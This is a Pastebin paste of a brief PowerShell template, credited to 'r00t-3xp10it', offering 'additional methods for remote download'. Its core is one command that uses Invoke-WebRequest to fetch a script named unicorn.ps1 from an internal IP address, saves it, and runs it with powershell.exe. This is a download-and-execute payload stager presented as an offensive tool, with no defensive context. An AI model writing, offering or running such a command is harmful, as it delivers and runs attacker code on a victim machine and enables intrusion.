Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #
- # psh template | Author r00t-3xp10it
- #
- Write-Host "Additional Methods for Remote Download" -ForeGroundColor green -BackGroundColor black
- Write-Host " Invoke-WebRequest (r00t-3xp10it) " -ForeGroundColor red -BackGroundColor white
- Invoke-WebRequest "http://192.168.1.71/unicorn.ps1" -OutFile "unicorn.ps1" -PassThru; Start-Sleep 1; powershell.exe -File unicorn.ps1
Advertisement
Add Comment
Please, Sign In to add comment